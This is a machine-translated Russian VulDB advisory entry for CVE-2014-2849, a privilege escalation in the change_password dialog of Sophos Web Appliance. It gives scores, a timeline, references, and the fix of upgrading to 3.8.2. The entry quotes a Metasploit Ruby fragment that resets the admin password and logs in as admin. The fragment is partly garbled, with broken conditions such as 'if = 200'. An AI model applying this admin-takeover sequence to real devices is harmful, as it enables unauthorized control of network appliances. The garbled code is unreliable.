Sophos Web Appliance до 3.8.1 Change Password Dialog Box /index.php c эскалация привилегий

CVSS Meta Temp ScoreТекущая цена эксплойта (≈)Балл интереса CTI
6.7$0-$5k0.00

СводкаИнформация

Уязвимость была найдена в Sophos Web Appliance до 3.8.1. Она была объявлена как критический. Используемая неизвестная функция файла /index.php компонента Change Password Dialog Box. Выполнение манипуляции с аргументом c с входным значением change_password приводит к эскалация привилегий. Выявление этой уязвимости является CVE-2014-2849. Более того, эксплойт доступен. Рекомендуется выполнить обновление уязвимого компонента.

ПодробностиИнформация

Уязвимость была найдена в Sophos Web Appliance до 3.8.1. Она была объявлена как критический. Используемая неизвестная функция файла /index.php компонента Change Password Dialog Box. Выполнение манипуляции с аргументом c с входным значением change_password приводит к эскалация привилегий. Указание проблемы через CWE ведет к CWE-264. Данная уязвимость была опубликована 09.04.2014 исследователем Brandon Perry с идентификатором Article 120230 в виде Консультация (Веб-сайт) посредством Zero Day Initiative (ZDI). Консультация представлена на сайте sophos.com. Публичное раскрытие информации было согласовано с продавцом.

Выявление этой уязвимости является CVE-2014-2849. Присвоение CVE было выполнено 11.04.2014. Технические детали доступны. Данная уязвимость менее популярна, чем в среднем. Более того, эксплойт доступен. Эксплойт стал общедоступным и может быть использован. Текущая цена за эксплойт может составлять около USD $0-$5k в настоящее время. Проект MITRE ATT&CK использует технику атаки T1068 для этой проблемы.

Задано как Высокофункциональный. Эксплойт доступен для загрузки по адресу exploit-db.com. Данная уязвимость была эксплуатируема как непубличный 0-day эксплойт по меньшей мере 26 дней. В качестве 0-day ориентировочная цена на подпольном рынке составляла около $0-$5k. Код, используемый эксплойтом:

passchange = send_request_cgi({
  'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'),
  'method' => 'POST',
  'vars_post' => post
})
 
if = 200
  fail_with("Couldn't update admin's password")
end
 
print_status("Logging in as the admin now")
init = send_request_cgi({
  'uri' => normalize_uri(target_uri.path, 'index.php')
})
 
if = 200
  fail_with("Couldn't reget index page for admin auth")
end
 
init.body.each_line do |line|
  next if line !~ /name="STYLE" value="(.*)"/
  style = $1
end
 
post = {
  'STYLE' => style,
  'destination' => '',
  'section' => '',
  'username' => 'admin',
  'password' => 'notpassword'
}
 
login = send_request_cgi({
  'uri' => normalize_uri(target_uri.path, 'index.php?c=login'),
  'method' =>  'POST',
  'vars_post' => post
})
.

Обновление до версии 3.8.2 способно решить эту проблему. Рекомендуется выполнить обновление уязвимого компонента.

Информация об уязвимости также содержится в других базах данных уязвимостей: SecurityFocus (BID 66734), X-Force (92379), Secunia (SA57706) и SecurityTracker (ID 1030064).

ПродуктИнформация

Поставщик

Имя

Версия

Лицензия

Веб-сайт

CPE 2.3Информация

CPE 2.2Информация

CVSSv4Информация

VulDB Вектор: 🔍
VulDB Надёжность: 🔍

CVSSv3Информация

VulDB Meta Base Score: 7.5
VulDB Meta Temp Score: 6.7

VulDB Базовый балл: 7.5
VulDB Временная оценка: 6.7
VulDB Вектор: 🔍
VulDB Надёжность: 🔍

CVSSv2Информация

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
ВекторСложностьАутентификацияКонфиденциальностьЦелостностьДоступность
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать

VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надёжность: 🔍

NVD Базовый балл: 🔍

ЭксплуатацияИнформация

Класс: эскалация привилегий
CWE: CWE-264
CAPEC: 🔍
ATT&CK: 🔍

Физический: Нет
Локальный: Нет
Удалённый: Да

Доступность: 🔍
Доступ: публичный
Статус: Высокофункциональный
Автор: metasploit
Язык программирования: 🔍
Скачать: 🔍
Google Hack: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Прогноз цен: 🔍
Оценка текущей цены: 🔍

0-DayРазблокироватьРазблокироватьРазблокироватьРазблокировать
СегодняРазблокироватьРазблокироватьРазблокироватьРазблокировать

MetaSploit ID: sophos_wpa_iface_exec.rb
MetaSploit Имя: Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution
MetaSploit Файл: 🔍

Exploit-DB: 🔍

Разведка угрозИнформация

Интерес: 🔍
Активные акторы: 🔍
Активные группы APT: 🔍

КонтрмерыИнформация

Рекомендация: Обновление
Статус: 🔍

Время реакции: 🔍
0-дневное время: 🔍
Задержка эксплуатации: 🔍

Обновление: Web Appliance 3.8.2

ХронологияИнформация

06.11.2013 🔍
02.12.2013 +26 дни 🔍
08.04.2014 +127 дни 🔍
09.04.2014 +1 дни 🔍
09.04.2014 +0 дни 🔍
10.04.2014 +1 дни 🔍
10.04.2014 +0 дни 🔍
10.04.2014 +0 дни 🔍
11.04.2014 +1 дни 🔍
11.04.2014 +0 дни 🔍
11.04.2014 +0 дни 🔍
06.07.2025 +4104 дни 🔍

ИсточникиИнформация

Поставщик: sophos.com

Консультация: Article 120230
Исследователь: Brandon Perry
Статус: Подтверждённый
Подтверждение: 🔍
Скоординированный: 🔍

CVE: CVE-2014-2849 (🔍)
GCVE (CVE): GCVE-0-2014-2849
GCVE (VulDB): GCVE-100-12864
X-Force: 92379 - Sophos Web Appliance change_password security bypass, High Risk
SecurityFocus: 66734 - Sophos Web Appliance Privilege Escalation and Remote Code Execution Vulnerabilities
Secunia: 57706 - Sophos Web Appliance Security Bypass Vulnerability, Less Critical
OSVDB: 105636
SecurityTracker: 1030064

scip Labs: https://www.scip.ch/en/?labs.20161013
Разное: 🔍
Смотрите также: 🔍

ВходИнформация

Создано: 10.04.2014 14:31
Обновлено: 06.07.2025 05:27
Изменения: 10.04.2014 14:31 (91), 01.04.2019 11:21 (3), 06.07.2025 05:27 (21)
Завершенный: 🔍
Cache ID: 216:2AB:103

VulDB is the best source for vulnerability data and more expert information about this specific topic.

Обсуждение

Might our Artificial Intelligence support you?

Check our Alexa App!